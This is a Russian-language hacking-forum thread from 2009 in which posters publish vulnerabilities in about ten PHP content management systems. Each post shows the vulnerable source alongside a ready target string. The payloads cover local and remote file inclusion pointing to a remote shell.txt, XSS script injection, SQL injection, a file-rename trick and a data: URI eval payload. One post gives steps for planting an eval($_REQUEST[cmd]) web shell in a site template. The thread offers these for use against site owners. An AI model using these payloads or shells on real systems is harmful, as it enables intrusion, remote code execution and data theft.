Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.12.2009, 00:56
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Splash Frog CMS
Author: http://www.twinleafstudios.net/
Version: 2.0.1
LFI
file: details.php
/*треуються права админа*/
PHP код:
function main_content() {
if(empty($_GET['sec']))
{ header("Location: main.php"); exit; }
if(!empty($_SESSION['SplashFrog_ViewSite'])) {
if(($_SESSION['SplashFrog_SiteAdmin'] != '1') && (!in_array($_SESSION['SplashFrog_ViewSite'], $_SESSION['SplashFrog_SiteID'])))
{ echo '<p class="error">You do not have permission to view this site.</p>'; return; }
}
if(file_exists("section/".$_GET['sec'].".php"))
{ include_once("section/".$_GET['sec'].".php"); }
else
{ echo '<p class="error">Unable to access the selected section.</p>'; }
}
PHP код:
<?php if(function_exists(main_content)) { echo main_content(); } ?>
target: ?sec=../../../file.php%00
/*без прав админа*/
file: details.php
PHP код:
function main_submenu() {
if(file_exists("submenu/".$_GET['sec'].".php"))
{ include_once("submenu/".$_GET['sec'].".php"); }
}
Вызываеться в файле:
file: /template/tmpl2.php
PHP код:
<?php if(function_exists(main_submenu)) { echo main_submenu(); } ?>
target: ?sec=../../../file.php$00
XSS
В папке /forms/ уязвим почти каждый файл.пример:
file: /forms/admin/admin.php
PHP код:
<input type="hidden" name="adminID" value="<?=$_POST['adminID'];?>" />
<input type="hidden" name="curUsername" id="curUsername" value="<?=$_POST['username'];?>" />
<input type="hidden" name="curEmail" id="curEmail" value="<?=$_POST['email'];?>" />
target: {POST} ?username="><script>alert('hacker');</script>
|
|
|
09.12.2009, 01:53
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: CruXCMS
Author: http://www.cruxsoftware.co.uk/
Version: 3.0.0
Я незнаю как это назвать,это даже не уязвимость,а скорее эдакая бага, "подлянка" админам.
Суть в том,что можно переименовывать скрипты на сервере в произвольные имена.А именно:
file: /manager/rename.php
PHP код:
if (isset($_GET['Nameold'])) {
$Nameold = $_GET['Nameold'];
}
if (isset($_POST['Show'])) {
$Show = $_POST['Show'];
}
if (isset($_GET['Show'])) {
$Show = $_GET['Show'];
}
if (isset($_POST['Namenew'])) {
$Namenew = preventinjection($_POST['Namenew']);
....
if (!rename($linkold, $linknew)) {
echo "<h1>Renaming of $Nameold has failed, please check folder permissions<br> and that a
file with that name doesn't already exist</h1>";
}
..
функция preventinjection - чекает на кавычки.
target: /manager/rename.php?Nameold=index.php&Namenew=2674624624fff &Show=Finished
После этого скрипты index.php будет переименован в 2674624624fff.php
Вот так вот,мучаем админов 
Последний раз редактировалось m0Hze; 09.12.2009 в 01:58..
|
|
|
|
09.12.2009, 02:18
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: DmcCMS
Author: http://sourceforge.net/projects/dmcms/
Version: 0.7.6
LFI
Пришлось немножко подумать,над тем как тут провернуть LFI, мой сонный мозг выдал мне этот вариант.Итак вот он:
/*Для реализации необходим register_globals = ON */
file: user_language.php
PHP код:
if (!isset($_COOKIE["deeemm_language"])) {
$language = '1';
session_start();
$_SESSION['language'] = $language;
header("Cache-control: private"); //IE6 session control fix
header('P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"'); //bypass 3rd party policy
setcookie("deeemm_language" ,$language ,time()+60*60*12*365 );
}
elseif (isset($_COOKIE["deeemm_language"])) {
session_start();
header("Cache-control: private"); //IE6 session control fix
$language = $_COOKIE["deeemm_language"];
}
....
$sql_query = mysql_query("SELECT * FROM `" . $db_table_prefix . "admin` WHERE `id` = 0");
while($sql_result = mysql_fetch_array($sql_query)) {
$language_1_flag = $sql_result[language_1_flag];
$language_2_flag = $sql_result[language_2_flag];
$language_3_flag = $sql_result[language_3_flag];
$language_4_flag = $sql_result[language_4_flag];
}
...
$language_file = 'language/' . ${'language_' . $language} . '.php';
require $language_file;
target: Отправляем запрос, где:
Код:
GET target/user_language.php?language_666=../../LFI HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Keep-Alive: 300
Connection: keep-alive
Cookie: deeemm_language=666;
Cache-Control: max-age=0
Ну вот и все,получаем инклуд файла,в переменной: language_666.
Вроде бы правильно все,не пинать,спать хочу очень  Если что,поправьте я утром исправлю сообщение.
/*PS: на сегодня ставил задачу как можно больше разобраться в лфи\рфи,поэтому концентрировал все внимание на инклудах.Завтра еще раз просмотрю эти движки,и если будет что-то еще - добавлю.Споки ноки*/
Последний раз редактировалось m0Hze; 09.12.2009 в 02:33..
|
|
|
|
09.12.2009, 16:04
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: DBHCMS - Web Content Management System
Author: http://www.drbenhur.com/
Version: 1.1.4
RFI
/*Необходимо register_globals = ON and allow_url_include = ON без второго юзаеться как LFI*/
file: index.php
PHP код:
function dbhcms_init($core) {
$init = $core.'init.php';
$page = $core.'page.php';
if ((is_file($init))&&(is_file($page))) {
require_once($init);
require_once($page);
} else {
die('<div style="color: #872626; font-weight: bold;">
FATAL ERROR - Could not find the initialzation files.
Please check the "$dbhcms_core_dir" parameter in the "config.php" and make
shure the directory is correct.
</div>');
}
}
......
dbhcms_init($GLOBALS['dbhcms_core_dir']);
target: ?dbhcms_core_dir=http://site.com/shell.txt%00
|
|
|
|
09.12.2009, 16:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
в дополнение к классной статье Spyder в ноябрьском ][:
InstantCMS v1.5.2
В статье описывается, как залить шелл через встроенный дампер БД в админке, есть еще способ:
- редактирование файла ../templates/_default_/template.php прямо в админке:
Слева снизу - изменить настроки->дизайн->выбираем шаблон->Редактировать PHP
вписываем свой код:
if (isset($_REQUEST[cmd])) eval(stripslashes($_REQUEST[cmd]));
и по ссылке http://site.ru/index.php?cmd=phpinfo(); получаем практически готовый шелл
|
|
|
|
09.12.2009, 17:05
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Ovidentia CMS
Author: http://Ovidentia.org
Version: 6.x.x <= 7.1.7
RFI
Need: register_globals = ON allow_url_include = ON
file: /ovidentia/selector.php
PHP код:
require_once $GLOBALS['babInstallPath'] . 'utilit/uiutil.php';
require_once $GLOBALS['babInstallPath'] . 'utilit/tree.php';
target: ?babInstallPath=http://site.com/shell.txt%00
or
?babInstallPath=../../localfile.php%00
file: /ovidentia/statfaq.php
PHP код:
include_once $babInstallPath.'utilit/statutil.php';
include_once $babInstallPath.'utilit/uiutil.php';
target: ?babInstallPath=http://site.com/shell.txt%00
or
?babInstallPath=../../localfile.php%00
Выполнение произвольного кода!
Если allow_url_include = ON, то делаем запрос вида:
target: data:,<?php eval($_REQUEST[cmd]); ?>&cmd=phpinfo();
На выходе phpinfo();
Спасибо Ctacok
Последний раз редактировалось m0Hze; 11.12.2009 в 14:47..
|
|
|
|
10.12.2009, 21:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
mForum
Активная XSS:
1. Создаём топик с [IMG]javascript :alert()[/IMG]
2. usercp.php?mode=edit_profile : Image link = javascript :alert()
Код:
PHP код:
if ($_POST[avatar2] != "" AND $_POST[deleteavatar] == "") {
#THIRDIF#
$len = strlen($_POST[avatar2]) - 4;
$check_ext = substr($_POST[avatar2],$len,strlen($_POST[avatar2]));
if ($check_ext != ".gif" AND $check_ext != ".jpg")
profile_error("$lang[138]");
$_POST[avatar2] = str_replace(">", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("<", "", $_POST[avatar2]);
$_POST[avatar2] = str_replace("\"", "", $_POST[avatar2]);
if (strlen($_POST[avatar2]) > 200 OR strlen($_POST[avatar2]) < 7)
profile_error("$lang[140]");
$query_av = "UPDATE $table_users SET avatar=\"$_POST[avatar2]\" WHERE id=\"$_SESSION[user_id]\" LIMIT 1";
if (mysql_query($query_av,$db))
print "<li>$lang[141]</li>";
#THIRDIF#
}
3. post.php?mode=pvt [IMG]javascript :alert()[/IMG]
|
|
|
|
11.12.2009, 01:54
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Opus CMS
Author: http://opus.cx/
Version: 2.28
Blind-SQL
Во всех файлах админки, присутствует ф-ция check_author_cookie();, которая проверяет админ вы или нет,и если нет - exit();. Но в этом файле ее воткнули после кода,а не сначала его-же.Поэтому есть возможность поковыряться в бд ведь и про фильтрацию они тоже забыли.
file: /adm/backup.php
PHP код:
if ( isset($_GET["email"]) )
{
if ( $vp_author = mysql_fetch_array(mysql_db_query(VPUMP_DATABASE, "select * from vp_author where email = '".@$_GET["email"]."' and password = '".@$_GET["password"]."'")) )
target: 7 columns in table.
|
|
|
|
11.12.2009, 02:14
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: x3CMS
Author: http://www.x3cms.net/
Version: 0.3.2.1
LFI
file: page.php
PHP код:
$p = explode('/', $_REQUEST['pp']);
$a = array_shift($p);
...
$d = (isset($_REQUEST['d'])) ? $_REQUEST['d'] : ''; // addon
...
$aa = array_shift($p);
if (empty($d)) {
include './engine/'.$aa;
}
else if ($aa != 'install') {
include './add-on/'.$d.'/engine/'.$aa;
}
else {
include './add-on/'.$d.'/install.php';
}
target: ?pp=engine&d=../../lfi.php%00
|
|
|
|
11.12.2009, 02:26
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Bmachine
Author: http://boastology.com/
Version: 3.1
SQL-inj
file: login.php
PHP код:
$user=$db->query("SELECT user_login,last_login,user_pass,level FROM ".MY_PRF."users WHERE user_login='{$_POST['user_login']}'", false);
target: {POST} ?login=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
